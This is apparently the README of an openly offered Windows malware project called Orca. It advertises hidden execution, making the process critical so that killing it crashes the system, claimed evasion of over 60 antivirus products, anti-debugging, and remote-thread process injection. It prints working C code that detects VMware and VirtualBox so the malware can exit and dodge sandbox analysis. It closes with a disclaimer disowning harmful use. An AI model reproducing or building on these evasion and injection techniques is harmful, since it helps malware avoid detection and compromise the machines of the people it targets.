About Orca
- Orca is an Advanced Malware with multifeatures written in ASM/C/C++
features
- Run in Background (Hidden Mode)
Critical Process using RtlSetProcessIsCritical
- RtlSetProcessIsCritical makes the process critical, any attempt to terminate it will BSOD the system (Blue Screen of Death) , although it can be bypassed easly using NtSetInformationProcess by injecting DLL into it , i made PoC of it you can check it from here BypassRtlSetProcessIsCritical
- Undectable (60+ Antivirus )
Detecting Virtual Environment Files and Processes
- Code Snippets
- the following Function will search for VMware Processes
void antiVm()
{
const char* arr[] = { "vmtoolsd.exe","vmwaretray.exe","vmwareuser.exe" ,"VGAuthService.exe" ,"vmacthlp.exe" };
for (int i = 0; i < strlen(*arr); i++)
{
if (GetPID(arr[i]))
exit(EXIT_FAILURE);
}
}- the following Function will search for VirtualBox Files
void antiVr() {
if (IsExist("C:\\windows\\System32\\vboxoglpackspu.dll"))exit(EXIT_FAILURE);
else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxSF.sys")) exit(EXIT_FAILURE);
else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxVideo.sys")) exit(EXIT_FAILURE);
else if (IsExist("C:\\windows\\System32\\vboxoglpassthroughspu.dll")) exit(EXIT_FAILURE);
else if (IsExist("C:\\windows\\System32\\vboxdisp.dll")) exit(EXIT_FAILURE);
else if (IsExist("C:\\windows\\System32\\vboxhook.dll")) exit(EXIT_FAILURE);
else if (IsExist("C:\\windows\\System32\\vboxmrxnp.dll")) exit(EXIT_FAILURE);
else if (IsExist("C:\\windows\\System32\\vboxogl.dll")) exit(EXIT_FAILURE);
else if (IsExist("C:\\windows\\System32\\vboxoglcrutil.dll")) exit(EXIT_FAILURE);
else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxGuest.sys")) exit(EXIT_FAILURE);
else if (IsExist("C:\\windows\\System32\\vboxoglerrorspu.dll")) exit(EXIT_FAILURE);
else if (IsExist("C:\\windows\\System32\\vboxoglfeedbackspu.dll")) exit(EXIT_FAILURE);
else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxMouse.sys")) exit(EXIT_FAILURE);
else if (IsExist("C:\\windows\\System32\\vboxoglarrayspu.dll")) exit(EXIT_FAILURE);
}Anti-Debug
- the Malware will self close 'Silently' anytime detect a debugger or being debugged!! AntiDBG Library
- The techniques that used to Detect debuggers :
- Memory
- CPU
- Timing
- Forced Exceptions
Process Injection
- Process Injection It is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
TECHNICAL DETAILS
- Open process with Access Rights
- LPTHREAD_START_ROUTINE (its a pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread and represents the starting address of the thread in the remote process. The function must exist in the remote process.)
- VirtualAllocEx (used to allocate space from the target process virtual memory)
- WriteProcessMemory (used to write the path of the shellcode into the allocated memory)
- CreateRemoteThread (used to creates a thread in the virtual memory area of a process)
More Advanced features will be added soon
Disclaimer
- I take no responsibility for Harmful using or any damage can make. Use it at your own risk.